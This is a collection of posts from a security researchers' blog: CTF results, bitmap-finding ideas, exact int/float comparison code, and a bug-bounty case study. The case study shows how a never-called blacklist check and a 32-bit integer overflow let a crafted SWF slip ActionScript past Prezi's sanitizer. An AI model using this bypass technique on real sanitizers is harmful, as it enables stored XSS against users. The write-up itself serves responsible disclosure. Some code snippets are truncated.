Insomni’hack 2015, presentation slide deck and CTF results

By j00ru | Tue, 24 Mar 2015 18:48:28 +0000 | @domain:
(Collaborative post by Gynvael Coldwind and Mateusz “j00ru” Jurczyk) Just three days ago another edition of the great Insomni’hack conference held in Geneva came to an end. While the event was quite short, lasting for just one day, it featured three tracks of security talks, including some very interesting ones such as Automotive security by […]

Insomni'hack 2015, presentation slide deck and CTF results

By Gynvael Coldwind | Tue, 24 Mar 2015 00:09:21 +0100 | @domain:
(Collaborative post by Gynvael Coldwind and Mateusz “j00ru” Jurczyk)
Just three days ago another edition of the great Insomni'hack conference held in Geneva came to an end. While the event was quite short, lasting for just one day, it featured three tracks of security talks, including some very interesting ones such as Automotive security by Chris Valasek, or Copy & Pest – A case-study on the clipboard, blind trust and invisible cross-application XSS by Mario Heiderich. This year we were also invited to the conference to talk about CTF techniques, experiences and entertaining tasks encountered by the Dragon Sector team we lead and actively play in. We thus gave a presentation called Pwning (sometimes) with style – Dragons’ notes on CTFs, and are now making the slide deck publicly available for your enjoyment:

Pwning (sometimes) with style – Dragons’ notes on CTFs (3.86MB, PDF)

While the conference was very well organized and had many interesting talks, the main event of the evening was only about to start at 18:00: the CTF competition organized by the Insomni'hack crew, which attracted hundreds of players from all around the world, including many top teams from the CTF scene (e.g. StratumAuhuur, int3pids, dcua, penthackon, 0x8F). Since we really liked the finals from last year, Dragon Sector also came back in a large squad of 9 players, one of whom played in a different team due to a strict 8-person limit. We did our best to defend last year's title (top 1) and eventually succeeded, but it was not an easy task for sure. The most intense moment was when the StratumAuhuur team submitted a flag 4 minutes before the end of the CTF (at 3:56:23 AM), closing our point advantage to only ~20 points, which was so close that it could have easily changed in favor of Stratum regardless of our actions (due to this year's variable task scoring, which accounted for the total number of teams solving each challenge). Fortunately, Gynvael and I were on the verge of solving another networking task at the time and barely managed to get it a little more than a minute before the end of the competition, consequently securing the win. The situation is well illustrated in the photo of the final ranking below.

The organizers, SCRT, have also published their own summary of the CTF with a full ranking and some interesting stats: Insomni’hack finals – CTF results.

How to automatically extract all raw bitmaps from a memory dump?

By Gynvael Coldwind | Fri, 27 Feb 2015 00:09:19 +0100 | @domain:
That's actually a real question with no solution (though some links) posted in this blog post. And the keyword here is "automatically" ;>

Let's start by making sure that the problem is stated clearly: we assume that we have a large memory blob (anything between 500 MB and 1 TB) and we want to find all raw bitmaps and their widths in it. Furthermore, since this is kinda ambiguous, by "raw bitmaps" I mean neither camera RAW formats used in digital photography (NEF, ORF, CR2 and the like) nor "image files" (like PNG, BMP, JPG, GIF, TIFF and the like) - how to find most of these things is of course common knowledge that can be summarized by "find a magic value or pattern that's commonly at the beginning". This approach has been used by many old school ripper programs like Multi Ripper (seen around in the late '90s, though I remember such apps from at least a few years earlier) or other similar though older apps, as well as newer stuff like binwalk or PhotoRec. What we're looking for is just plain bitmap data (8/24/32 bpp for starters) without any magic values, headers, compression or other strange encodings.

Where would this be useful? In analyzing various memory dumps or disk dumps where you can't make any smart calls about kernel/FS/heap/app memory structures or if parts of said structures are missing/have been wiped (so Volatility/Sleuth Kit are useless).

Usually the way I did this (and still do) was to open the file in IrfanView as .raw, set width to something around 1024, height to a large value, offset to whatever part I was analyzing and then I scrolled through the huge bitmap counting on my brain to spot any patterns. I'm not going to describe the exact details of this method, since Bernardo beat me to it and I have really nothing to add (though his GIMP method seems more friendly as you have a scroll bar to set the width which looks waaay better than putting the number manually in IrfanView). The thing I found surprising about his post is that the CTF task he gives as an example - coor coor from 9447 - is the exact task I had in mind when spawning the discussion with Ange (which later moved to twitter and made Bernardo write his post). Here are three of my findings from that task:

The discussion on Twitter included several interesting links/ideas:
- @doegox pointed to his tool
- @jchillerup pointed to the cantor dust talk/tool which doesn't solve the problem, but is (i.e. looks like) probably the best non-automatic tool for this purpose; some patterns remind me of one of my previous blog posts, which spawns an idea I guess on how to find candidate bitmaps in the binary blob.
- @scanlime pointed to the autocorrelation problem, which names the problem I was thinking about and points to the solution
- @hanno pointed to JPEG compression tested on various widths/offsets, which would be another idea to find candidate bitmaps
- @sqaxomonophonen pointed to FFT and looking for spikes, which would be a way to determine the width
- @CrazyLogLad suggested something similar
- @aeliasen said this:

I'd calculate the autocorrelation of the bytes; period with strongest autocorr. should give width. You might have to throw out small periods (like 1-3) and divide by pixel depth.
Seems I need to do some reading on autocorrelation/FFT to move this forward.
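
To make the autocorrelation idea a bit more concrete, here is a minimal Python sketch of it, not a tested solution for real dumps. Everything in it is an assumption made for illustration: the helper names (autocorrelation, guess_stride, make_fake_bitmap), the synthetic 8 bpp "bitmap" in which each row is a slightly modified copy of the previous one, and the decision to ignore lags below 4 bytes. The lag with the strongest autocorrelation is taken as the row stride in bytes, which for 24/32 bpp data would still have to be divided by the pixel size.

```python
import random


def autocorrelation(data, lag):
    """Normalized autocorrelation of a byte string at the given lag."""
    mean = sum(data) / len(data)
    variance = sum((b - mean) ** 2 for b in data)
    if variance == 0:
        return 0.0
    covariance = sum(
        (data[i] - mean) * (data[i + lag] - mean)
        for i in range(len(data) - lag)
    )
    return covariance / variance


def guess_stride(data, min_lag=4, max_lag=2048):
    """Return the lag (in bytes) with the strongest autocorrelation."""
    max_lag = min(max_lag, len(data) // 2)
    return max(range(min_lag, max_lag + 1),
               key=lambda lag: autocorrelation(data, lag))


def make_fake_bitmap(width, height, seed=1):
    """Synthetic 8 bpp image: each row is a slightly changed copy of the previous one."""
    rng = random.Random(seed)
    row = [rng.randrange(256) for _ in range(width)]
    pixels = bytearray()
    for _ in range(height):
        # Change roughly 10% of the pixels from one row to the next.
        for _ in range(width // 10):
            row[rng.randrange(width)] = rng.randrange(256)
        pixels.extend(row)
    return bytes(pixels)


bitmap = make_fake_bitmap(width=100, height=40)
stride = guess_stride(bitmap, max_lag=150)
print("guessed stride in bytes:", stride)
```

This brute-force version is quadratic in the window size, so on a large blob it would only make sense on small windows of candidate data; an FFT-based autocorrelation (as hinted at in the tweets above) would be the natural next step.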

If someone would like to try his luck with any of the two problems ([1] finding bitmap candidates in a LARGE binary blob and [2] automatically determining width of the candidate), the coor coor dump is here (link shamelessly taken from Bernardo's blog):

If you have any other ideas, comments or links, feel free to add them in the comment section.


Ubuntu proposed migration. update_output.txt

By sil2100 | Mon, 02 Feb 2015 11:47:00 GMT | @domain:
Those of you that know a thing or two about the Ubuntu archives also most probably know about the proposed pocket for every distribution series. In a quick overview, every upload made to the main archives first goes to -proposed and then migrates (in case of the development series) to the release pocket once the so called proposed migration is happy with it. Most of the time it just migrates fine on its own, but sometimes a package can fail to "move on". And this is where update_excuses.html and update_output.txt come in handy.

SECURE 2014 slide deck and Hex-Rays IDA Pro advisories published

By j00ru | Thu, 23 Oct 2014 12:32:55 +0000 | @domain:
Yesterday I gave a talk at a Polish security conference held in Warsaw, Poland, called “Ucieczka z Matrixa: (nie)bezpieczna analiza malware” (eng. “Escaping the Matrix: (in)secure malware analysis”). The presentation was lightly technical and concerned the different threats of using popular software to aid in interacting with and analyzing malware samples. While the talk was […]

CONFidence 2014 video from our talk on CTFs

By Gynvael Coldwind | Sat, 19 Jul 2014 00:09:01 +0200 | @domain:
Just a quick note: the video from j00ru's and my talk from this year's CONFidence edition is now online. As mentioned in the previous post on the topic, the talk was called "On the battlefield with the Dragons" and consisted of a selection of interesting CTF task solutions with some useful tips and tricks near the end.

Links: video, slides.

Let us know what you think!

Slides from Ange's and my talk about Schizophrenic files, Area41

By Gynvael Coldwind | Tue, 03 Jun 2014 00:08:59 +0200 | @domain:
Yesterday I had the pleasure to co-present with Ange Albertini (@angealbertini) - if you are into binary stuff, you probably know his website - corkami, which has all sorts of cool stuff, from posters detailing binary formats (e.g. PE 101) to binary polyglots, etc. We talked about "schizophrenic files", i.e. various file formats which get interpreted differently depending on what program you use (e.g. a BMP image which, when viewed in one viewer, shows a cat but when using a different one shows a flying shark). Basically the story goes that we both did (separately) some more or less random digging on (or more accurately in my case: randomly stumbling on) behaviors which allow one to create a file which is open to creative interpretation by the software, or (more commonly) cases where parser authors just decide not to follow the specs or understand them in a different way; we decided to gather all this in one place and hence the talk. We presented it at Area41 in Zurich (which btw turned out to be a really well organized and awesome conference). Slides and PoCs are available below.

Slides: Schizophrenic files (Ange Albertini, Gynvael Coldwind)
PoCs: Schizophrens (PoC) ("All" contains all the files from the directories)

As usual, feedback is most welcome!


CONFidence 2014 slides from Dragon Sector are now available

By j00ru | Thu, 29 May 2014 10:07:24 +0000 | @domain:
(Collaborative post by Gynvael Coldwind and Mateusz “j00ru” Jurczyk) Just yesterday another edition of the largest and most successful IT security conference held in Poland – CONFidence – ended. The Dragon Sector CTF team (which we founded and are running) actively participated in the organization of the event by hosting an onsite, individual CTF for […]

CONFidence 2014 slides from Dragon Sector are now available

By Gynvael Coldwind | Thu, 29 May 2014 00:08:57 +0200 | @domain:
(Collaborative post by Gynvael Coldwind and Mateusz "j00ru" Jurczyk)

Just yesterday another edition of the largest and most successful IT security conference held in Poland - CONFidence - ended. The Dragon Sector CTF team (which we founded and are running) actively participated in the organization of the event by hosting an onsite, individual CTF for the conference attendees and giving a talk about the most interesting challenges we have solved so far in our not too long CTF career.

The final standings of the CONFidence 2014 CTF can be found below. We will also publish a more detailed summary, together with some or all of the challenges, on our official Dragon Sector blog within a few days.

1. liub, 2. dcua, 3. 4c...fd sector

The slide deck from our presentation can be found below:
On the battlefield with the Dragons - the interesting and surprising CTF challenges (3.93MB, PDF)


A case of a curious LibTIFF 4.0.3 + zlib 1.2.8 memory disclosure

By j00ru | Wed, 30 Apr 2014 14:23:21 +0000 | @domain:
As part of my daily routine, I tend to fuzz different popular open-source projects (such as FFmpeg, Libav or FreeType2) under numerous memory safety instrumentation tools developed at Google, such as AddressSanitizer, MemorySanitizer or ThreadSanitizer. Every now and then, I encounter an interesting report and spend the afternoon diving into the internals of a specific […]

The perfect int == float comparison

By Gynvael Coldwind | Sun, 27 Apr 2014 00:08:55 +0200 | @domain:
Just to be clear, this post is not going to be about the float vs. float comparison. Instead, it will be about trying to compare a floating point value with an integer value in an accurate, precise way. It will also be about why just doing int_value == float_value in some languages (C, C++, PHP, and some others) doesn't give you the result you would expect - a problem which I recently stumbled on when trying to fix a certain library I was using.

UPDATE: Just to make sure we see it in the same way: this post is about playing with bits and floats just for the sake of playing with bits and floats; it's not something you could or should use in anything serious though :)

UPDATE 2: There were two undefined behaviours pointed out in my code (one, two) - these are now fixed.

The problem explained

Let's start by demonstrating the problem by running the following code that compares subsequent integers with a floating point value:

float a = 100000000.0f;
printf("...99 --> %i\n", a == 99999999);
printf("...00 --> %i\n", a == 100000000);
printf("...01 --> %i\n", a == 100000001);
printf("...02 --> %i\n", a == 100000002);
printf("...03 --> %i\n", a == 100000003);
printf("...04 --> %i\n", a == 100000004);
printf("...05 --> %i\n", a == 100000005);

The result:

...99 --> 1
...00 --> 1
...01 --> 1
...02 --> 1
...03 --> 1
...04 --> 1
...05 --> 0

Sadly this was to be expected in the floating point realm. However, while in this world both 99999999 and 100000004 might be equal to 100000000, this is sooo not true for common sense nor standard arithmetic.

Let's look at another example - an attempt to sort a collection of numbers by value in PHP:

$x = array(

foreach ($x as $i) {
  if (is_float($i)) {
    printf("%.0f\n", $i);
  } else {
    printf("%i\n", $i);
  }
}

The "sorted" result (64-bit PHP):

> php test.php

Side note: The code above must be executed using 64-bit PHP. The 32-bit PHP has integers limited to 32-bit, so the numbers I used in the example would exceed their limit and would get silently converted to doubles. This results in the following output:


So, what's going on?

It all boils down to floats having too little precision for larger integers (this is a good time to look at this and this). For example, the 32-bit float has only 23 bits dedicated to the significand - this means that if an integer value that is getting converted to float needs more than 24 bits (sic!; keep in mind that in floats there is a hardcoded "1" at the top position, which is not present in the bit-level representation) to be represented, it will lose its least significant bits - i.e. it gets rounded to the nearest value that does fit (which is why both 99999999 and 100000004 ended up equal to 100000000 above).

In the C-code case above the decimal value 100000001 actually requires 27 bits to be properly represented:

101111101011110000100000001

However, since only the leading "1" and the following 23 bits will fit inside a float, the "1" at the very end gets lost. Therefore, this number actually becomes another number:

101111101011110000100000000

Which in decimal is 100000000 and therefore is equal to the float constant of 100000000.0f.

Same problem exists between 64-bit integers and 64-bit doubles - the latter have only 52 bits dedicated for storing the value.
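
The loss of precision is easy to reproduce outside of C as well. Below is a small Python sketch (the helper name to_float32 is made up for this example) that squeezes a number through the 32-bit float encoding using the standard struct module and reads it back. It assumes the usual IEEE 754 single-precision format and the default round-to-nearest mode.

```python
import struct


def to_float32(value):
    """Round a number to the nearest 32-bit float and return it as a Python float."""
    return struct.unpack("<f", struct.pack("<f", float(value)))[0]


a = to_float32(100000000)
for i in range(100000000 - 5, 100000000 + 6):
    as_float = to_float32(i)
    # Show what the integer turns into and whether it now compares equal to a.
    print(i, "->", int(as_float), as_float == a)
```

Since Python's own float is a 64-bit double, the value returned by to_float32 can be printed or compared without losing anything further.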

A somewhat amusing side note

Actually, it gets even better. Let's re-write the first code shown above (the C one) to use a loop:

float a = 100000000.0f;
int i;
for (i = 100000000 - 5; i <= 100000000 + 5; i++) {
  printf("%11.1f == %9u --> %i\n", a, i, a == i);
}

As you can see, there are no big changes. Now let's compile it and run it:

>gcc test.c
> a
100000000.0 == 99999995 --> 0
100000000.0 == 99999996 --> 0
100000000.0 == 99999997 --> 0
100000000.0 == 99999998 --> 0
100000000.0 == 99999999 --> 0
100000000.0 == 100000000 --> 1
100000000.0 == 100000001 --> 0
100000000.0 == 100000002 --> 0
100000000.0 == 100000003 --> 0
100000000.0 == 100000004 --> 0
100000000.0 == 100000005 --> 0

The result is magically correct! How about we compile it with optimization then?

>gcc test.c -O3
> a
100000000.0 == 99999995 --> 0
100000000.0 == 99999996 --> 1
100000000.0 == 99999997 --> 1
100000000.0 == 99999998 --> 1
100000000.0 == 99999999 --> 1
100000000.0 == 100000000 --> 1
100000000.0 == 100000001 --> 1
100000000.0 == 100000002 --> 1
100000000.0 == 100000003 --> 1
100000000.0 == 100000004 --> 1
100000000.0 == 100000005 --> 0

Why is that? Well, in both cases the compiler needs to convert the integer to a float and then compare it with the second float value. This however can be done in two different ways:

Option 1: The integer is converted to a floating point value, then is stored in memory as a 32-bit float and then loaded into the FPU for the comparison OR (in case of constants) the integer constant can be converted to a 32-bit float constant at compilation time and then it will be loaded into the FPU for comparison at runtime.
Option 2: The integer is directly loaded into the FPU for comparison (using fild FPU instruction or similar).

The difference here is related to the FPU internally operating on larger floating point values with more precision (by default it's 80-bits, though you can change this) - so the 32-bit integer isn't truncated on load, as it would happen if it gets converted explicitly to a 32-bit float (which, again, has only 24-bits for the actual value).

Which option is selected depends strictly on the compiler - its mood, version, options used at compilation, etc.

The perfect comparison

Of course, it's possible to do a perfect comparison.

The simplest and most straightforward way is to cast both the int value and the float value to a double before comparing them - double has a large enough significand to store all possible 32-bit int values. And for the 64-bit integers you can use the 80-bit long double (where the compiler provides one, e.g. GCC on x86), which has a 64-bit significand; unlike in float and double, the leading "1" is stored explicitly there and is part of those 64 bits.

But that's too easy. Let's try to do the actual comparison without converting to larger types.

This can be done in two ways: the "mathematical" way (or: value-specific way) and the encoding-specific way. Both are presented below.

UPDATE 3: Actually there seems to be another way, as pointed out in the comments below and in this reddit post. It does make sense, but I still wonder if there is any counterexample (please note that I'm not saying there is; I'm just saying it never hurts to look for one ;>).

The mathematical way

We basically do it the other way around - i.e. we try to convert the float to an integer. There are a couple of problems here which we need to deal with:

1. The float value might be bigger than INT_MAX or smaller than INT_MIN. In such case this might happen and we wouldn't be able to catch it after the conversion, so we need to deal with it sooner.

2. The float value might have a non-zero fractional part. This would get truncated when converted to an int (e.g. (int)1.1f is equal to 1) - we don't want this to happen either.

The implementation of this method (with some comments) is presented below:

#include <math.h>
#include <stdbool.h>

bool IntFloatCompare(int i, float f) {
  // Simple case.
  if ((float)i != f) {
    return false;
  }

  // Note: The constant used here CAN be represented as a float. Normally
  // you would want to use INT_MAX here instead, but that value
  // *cannot* be represented as a float.
  const float TooBigForInt = (float)0x80000000u;

  if (f >= TooBigForInt) {
    return false;
  }

  if (f < -TooBigForInt) {
    return false;
  }

  float ft = truncf(f);
  if (ft != f) {
    // Not an integer.
    return false;
  }

  // It should be safe to cast float to integer now.
  int fi = (int)f;
  return fi == i;
}

The encoding-specific way

This method relies on decoding the float value from the bit-level representation, checking if it's an integer, checking if it is in range and finally comparing the bits with the integer value. I'll just leave you with the code. If in doubt - refer to this wikipedia page.

#include <limits.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

bool IntFloatCompareBinary(int i, float f) {
  uint32_t fu32;
  memcpy(&fu32, &f, 4);

  uint32_t sign = fu32 >> 31;
  uint32_t exp = (fu32 >> 23) & 0xff;
  uint32_t frac = fu32 & 0x7fffff;

  // NaN? Inf?
  if (exp == 0xff) {
    return false;
  }

  // Subnormal representation?
  if (exp == 0) {
    // Check if fraction is 0. If so, it's true if "i" is 0 as well.
    // Otherwise it's false in all cases.
    return (frac == 0 && i == 0);
  }

  int exp_decoded = (int)exp - 127;

  // If exponent is negative, the number has a fraction part, which means it's not equal.
  if (exp_decoded < 0) {
    return false;
  }

  // If exponent is above 31, int cannot represent so big numbers.
  if (exp_decoded > 31) {
    return false;
  }

  // There is one case where exp_decoded equal to 31 makes sense - when float is
  // equal to INT_MIN, i.e. sign is - and fraction part is 0. It is handled here,
  // because shifting the value below by 8 bits would overflow a 32-bit int.
  if (exp_decoded == 31) {
    return sign == 1 && frac == 0 && i == INT_MIN;
  }

  // What is left is in range of integer, but still can have a fraction part.

  // Check if any fraction part will be left.
  uint32_t value_frac = (frac << exp_decoded) & 0x7fffff;

  if (value_frac != 0) {
    return false;
  }

  // Check the value.
  int value = (1 << 23) | frac;
  int shift_diff = exp_decoded - 23;
  if (shift_diff < 0) {
    value >>= -shift_diff;
  } else {
    value <<= shift_diff;
  }

  if (sign) {
    value = -value;
  }

  return i == value;
}


The above functions can be used for a perfect comparison and they SeemToWork™ (at least on little endian x86). With some more work both functions could be converted to be perfect "less than" comparators which then could be used to fix the PHP sorting example.

But... seriously, just cast the integer and float to something that has more precision ;>

P.S. Did you know that there are exactly 75'497'471 positive integer values that can be precisely represented as a float? Not a lot for the total of 2'147'483'647 positive integers.
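
The number in the P.S. can be re-derived with a few lines of Python. This is just a counting sketch (the function name count_exact_ints is invented for this example) that assumes a 24-bit significand including the implicit "1": below 2^24 every integer is representable, and in every range [2^e, 2^(e+1)) above that the representable values are spaced 2^(e+1-24) apart.

```python
def count_exact_ints(max_value=2**31 - 1, significand_bits=24):
    """Count positive integers <= max_value that a float with the given
    significand width (24 bits for a 32-bit float) represents exactly."""
    total = 0
    exponent = 0
    while (1 << exponent) <= max_value:
        low = 1 << exponent
        high = min((1 << (exponent + 1)) - 1, max_value)
        # Spacing between neighbouring representable values in [2^e, 2^(e+1)).
        step = 1 << max(0, exponent + 1 - significand_bits)
        total += (high - low) // step + 1
        exponent += 1
    return total


print(count_exact_ints())  # 75497471
```

In other words: 2^24 - 1 integers below 2^24, plus 2^23 integers in each of the seven ranges between 2^24 and 2^31.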

Integer overflow into XSS and other fun stuff - a case study of a bug bounty

By Gynvael Coldwind | Thu, 27 Mar 2014 00:08:53 +0100 | @domain:
Some time ago I decided to spend a few evenings playing with bug bounties. I've looked around and finally decided to focus on Prezi, since, being a user of their product, I was already somewhat familiar with it. As I seem to be naturally drawn to low-level areas, this quickly turned into an ActionScript reverse-engineering exercise with digging into the internals of SWF file format. I found a couple of interesting and fun bugs (e.g. an integer overflow that led to ActionScript code execution - you don't commonly see these this far from the C/C++ kingdom), and a few of them are worth sharing in my opinion.

At the bottom of the post I've put some information about the tools I've used, just in case you're curious.

Random announcement not really having anything to do with the post: Dragon Sector is looking for sponsors that would help us play at DEF CON CTF. Thank you. Now back to our show!

What is Prezi?

Before I get to the juicy part, let's do a really quick intro to get everyone into context: Prezi is basically a huge Flash application that allows you to make cool-looking animated presentations in a really easy way. They provide both an online service and storage, and a desktop version which basically is just a standalone Flash application; I focused only on the online application and the surrounding web service.

As far as the Prezi Bug Bounty Program goes, you can read all about it on the program's page. I'll just add that everything (communication, fixing bugs, etc.) went smoothly and that Prezi has a really friendly security team :)

Bug 1: SWF sanitization incomplete blacklist into AS code execution (XSS)

One of Prezi's features is embedding user-provided Flash applets into the presentation. Of course, before the SWF is embedded, it's scrubbed for any parts that contain ActionScript or import other SWF files - this is done to prevent executing the user's (attacker's) code. As soon as the SWF is clean, it gets loaded into Prezi's context.

The SWF (under the optional DEFLATE compression layer) is basically a chunk based format. Each chunk starts with a header (and the data follows), that looks like this:

Short chunk: [ data size (6 bits) ][ tag ID (10 bits) ]
Long chunk: [ 0x3f ][ tag ID (10 bits) ][ data size (32 bits) ]

Both the formats of the chunks and the tag IDs are defined in the "SWF File Format Specification" released by Adobe. As of today the current version is 19 (updated April 23, 2013), and, as is to be expected, it has "only" 243 pages. There are currently 94 tag IDs defined (from 0 to 93, with a couple missing, e.g. ID 92 or ID 79-81), with some of them being just iterations of a given chunk type (e.g. ID 2 - DefineShape, ID 22 - DefineShape2, ID 32 - DefineShape3 and ID 83 - DefineShape4).
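
For readers who prefer code to bit diagrams, the two header layouts above can be decoded roughly like this. It's a Python sketch written for this explanation, not Prezi's code: the function name parse_tag_header is made up, and the header is assumed to be a little-endian 16-bit word with the data size in the low 6 bits and the tag ID in the upper 10 bits, optionally followed by a 32-bit size.

```python
import struct

LONG_FORM_MARKER = 0x3F  # a 6-bit size of 0x3f means "a 32-bit size follows"


def parse_tag_header(data, pos=0):
    """Return (tag_id, data_size, header_size) for the chunk header at pos."""
    (code_and_size,) = struct.unpack_from("<H", data, pos)
    tag_id = code_and_size >> 6
    size = code_and_size & 0x3F
    if size != LONG_FORM_MARKER:
        return tag_id, size, 2
    (long_size,) = struct.unpack_from("<I", data, pos + 2)
    return tag_id, long_size, 6


# A short DoAction (ID 12) header with 5 bytes of data, and a long
# DoInitAction (ID 59) header announcing 1000 bytes of data.
short_header = struct.pack("<H", (12 << 6) | 5)
long_header = struct.pack("<HI", (59 << 6) | 0x3F, 1000)

print(parse_tag_header(short_header))  # (12, 5, 2)
print(parse_tag_header(long_header))   # (59, 1000, 6)
```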

As mentioned, the scrubbing basically went after the chunks which might lead to code execution - if such a chunk was found, it was removed from the SWF.

There are basically three groups of chunks that may result in code execution:
  1. Chunks which just execute code, e.g. ID 59 - DoInitAction or ID 12 - DoAction.
  2. Chunks which import resources (chunks) from other SWF files, e.g. ID 57 - ImportAssets or the second version of this chunk with ID 71.
  3. Chunks representing graphical objects which may have some actions defined - e.g. ID 7 DefineButton, which can perform actions (i.e. run ActionScript) when e.g. it's clicked.
As one can imagine, Prezi did contain three functions responsible for recognizing these groups:

private static function isTagTypeCode(param1:uint) : Boolean
{
    return param1 == 12 || param1 == 59 || param1 == 76 || param1 == 82;
}// end function

private static function isTagTypeImports(param1:uint) : Boolean
{
    return param1 == 57 || param1 == 71;
}// end function

private static function isTagTypeContainsActions(param1:uint) : Boolean
{
    return param1 == 7 || param1 == 26 || param1 == 34 || param1 == 39 || param1 == 70;
}// end function

Here's the catch: isTagTypeContainsActions was never called. So basically embedding a Flash file with e.g. a button that had actions defined (e.g. the "on mouse over" action) led to arbitrary ActionScript code execution in the context of Prezi, which is basically an XSS (and a stored/wormable one at that).

The tricky part with the fix here is that ideally you don't want to remove graphical elements from the SWF, so removing whole chunks in this case is overkill. What you want to do is to remove the actions alone and that requires more code and digging deeper into the format, making the simple solution more complex.

On a more general note: using a blacklist is usually a bad idea; for example, a new SWF File Format Specification comes out with Tag ID 95 defined as DoInitAction2 and you have to update the application. You miss a beat and you have an XSS again. A cleaner solution here would be to have a whitelist of allowed tags and just remove everything else.
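
To illustrate the difference, a whitelist-based filter could look more or less like the Python sketch below. This is not the fix Prezi deployed; the ALLOWED_TAGS set and the filter_tags helper are hypothetical, and the set only contains a handful of tag IDs mentioned in this post (End, ShowFrame, SetBackgroundColor and the DefineShape family). A real list would have to be built by going through the specification tag by tag.

```python
# Hypothetical whitelist: End, ShowFrame, DefineShape, SetBackgroundColor,
# DefineShape2, DefineShape3, DefineShape4.
ALLOWED_TAGS = {0, 1, 2, 9, 22, 32, 83}


def filter_tags(tags):
    """Keep only the (tag_id, payload) pairs whose tag ID is explicitly allowed."""
    return [(tag_id, payload) for tag_id, payload in tags if tag_id in ALLOWED_TAGS]


tags = [
    (9, b"\xff\xff\xff"),  # SetBackgroundColor: kept
    (12, b"\x00"),         # DoAction: dropped
    (7, b""),              # DefineButton: dropped (may carry actions)
    (95, b""),             # unknown tag from some future spec: dropped by default
    (1, b""),              # ShowFrame: kept
    (0, b""),              # End: kept
]
kept = filter_tags(tags)
print([tag_id for tag_id, _ in kept])  # [9, 1, 0]
```

The important property is the default: a tag nobody thought about (like the made-up ID 95) is removed without any code change.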

Bug 2: Integer overflow in AS into XSS

Digging deeper into the chunk removing code I noticed the following code:

private static function skipTag(param1:ByteArray) : void
{
    var _loc_2:* = getTagLengthAndSkipHeader(param1);
    param1.position = param1.position + _loc_2;
}// end function

The first line of the function body retrieves an attacker-controlled chunk length from the SWF file - as noted in the previous bug, for long chunks this can be a 32-bit value, and the returned type is uint.

The second line is an addition assignment that skips past the chunk-that-is-OK in the data stream. The param1.position is also uint according to the AS documentation.

You know where this is going :)

In ActionScript uint is a 32-bit unsigned value with modulo arithmetic, so the result of the above addition is also truncated to 32-bit, regardless of its true value. So yes, it's an integer overflow. And it allowed one to bypass the SWF sanitizer.
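
The wrap-around itself is plain modulo 2^32 arithmetic and can be modelled in a few lines of Python. The function names and the example positions (1000 and 100) are made up for this illustration; only the 32-bit modulo behaviour comes from the description above.

```python
UINT32_MASK = 0xFFFFFFFF


def skip_tag(position, tag_length):
    """Model of `position = position + length` done on 32-bit unsigned integers."""
    return (position + tag_length) & UINT32_MASK


def length_to_reach(position_after_header, target):
    """The 32-bit length value which makes skip_tag() land exactly on target."""
    return (target - position_after_header) & UINT32_MASK


# The stream is at offset 1000 right after reading a long chunk header
# and we want the sanitizer to continue parsing at offset 100 instead.
length = length_to_reach(1000, 100)
print(hex(length))             # 0xfffffc7c
print(skip_tag(1000, length))  # 100
```

So a huge "length" in a long chunk header works as a negative offset, which is what sends the sanitizer backwards.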

Exploiting this turned out to be quite interesting and included a small twist which made things even more entertaining.

Starting with the basic idea, here is how the sanitizer worked from a high level perspective (in pseudocode; I'll omit code added after patching previous bug, since it changes nothing):

SWF = decompress(SWF)
SWF.position ← 0
SWF.headers.fileLength ← SWF.length
skip SWF headers
while SWF.bytesAvailable > 0 {
  if Tag at SWF.position is in blacklist {
    eraseTag(SWF)
  } else {
    skipTag(SWF)
  }
}

The skipTag was already shown above, so that leaves just the eraseTag method:

old_position ← SWF.position
temp_buffer ← new ByteArray()
SWF.position ← old_position
SWF.length ← old_position + temp_buffer.length
SWF.position ← old_position

So eraseTag basically copies whatever is past the tag-to-be-removed on top of that tag and fixes the total data size (SWF.length) afterwards.
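
The same "copy the tail over the tag" operation can be written down in Python on a bytearray. This is a sketch of the behaviour as described above and not a translation of Prezi's actual code; the helper names tag_total_size, erase_tag and short_tag are invented here, and the header layout is the one described for Bug 1.

```python
import struct


def tag_total_size(data, pos):
    """Size in bytes of the chunk starting at pos, header included."""
    (code_and_size,) = struct.unpack_from("<H", data, pos)
    size = code_and_size & 0x3F
    if size != 0x3F:
        return 2 + size
    (long_size,) = struct.unpack_from("<I", data, pos + 2)
    return 6 + long_size


def erase_tag(data, pos):
    """Remove the chunk at pos from a bytearray; parsing continues at pos."""
    end = pos + tag_total_size(data, pos)
    tail = bytes(data[end:])  # whatever is past the tag-to-be-removed
    data[pos:] = tail         # copy it on top of the tag; the buffer shrinks
    return pos


def short_tag(tag_id, payload):
    """Build a chunk with a short header (payload shorter than 63 bytes)."""
    return struct.pack("<H", (tag_id << 6) | len(payload)) + payload


background = short_tag(9, b"\xff\xff\xff")  # SetBackgroundColor, 5 bytes in total
do_action = short_tag(12, b"\x00")          # DoAction, starts at offset 5
show_frame = short_tag(1, b"")              # ShowFrame

swf_tags = bytearray(background + do_action + show_frame)
erase_tag(swf_tags, len(background))
print(swf_tags == background + show_frame)  # True
```

Note that nothing here checks whether pos really points at the beginning of a chunk, which is exactly the assumption the integer overflow breaks.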

The above allows us to basically jump backwards into the middle of a chunk (that's the consequence of the integer overflow) and remove however many bytes we like. This of course leads to changing how the Adobe Flash SWF interpreter will see the file, which is different from how the sanitizer originally saw it.

Let's look at an example:

So basically this is what's happening here (in chronological order):
  • The sanitizer reaches the overflowing tag and jumps backward into the first shown tag's data.
  • The data contains a valid chunk header, which describes a tag which is on the blacklist. This chunk gets removed.
  • The next tag (which originally was just the second chunk's data) has a huge length which sends the sanitizer to EOF and so the sanitizer exits.
  • When the Adobe Flash SWF parser sees the output, it sees the "send to EOF" chunk, the overflowing chunk and the padding just as the first tag's data, and ignores it (ShowFrame has no meaningful data from the SWF parser's perspective).
  • And it reaches the hidden "evil" tags which contain ActionScript to execute. The sanitizer never had a chance to see and sanitize these tags, since it was sent backwards and then to EOF.
Now, here's the catch: Prezi's sanitizing code has a bug which triggers a quirky behavior in Adobe Flash, which prevents execution of any ActionScript.

Remember these lines?

SWF = decompress(SWF)
SWF.headers.fileLength ← SWF.length

This fixes the SWF length after decompression. However, the file length in the SWF headers should also be fixed if any chunk gets removed, and it's not. For some reason an incorrect size causes Flash to ignore any ActionScript (I never got to the bottom of why exactly this is happening, though it acted very peculiarly).

So, to exploit this I needed to make the sanitizer fix the headers for me. This turned out to be both simple and a little more tricky. Simple, because the overflow allowed me to send the sanitizer back as far as I wanted - e.g. to the beginning of the SWF headers. And more tricky, because the DWORD representing the file size is just after the SWF magic and version, so that means I had to make the file size be at the same time a valid chunk header for a blacklisted chunk (but that turned out to not be a problem).

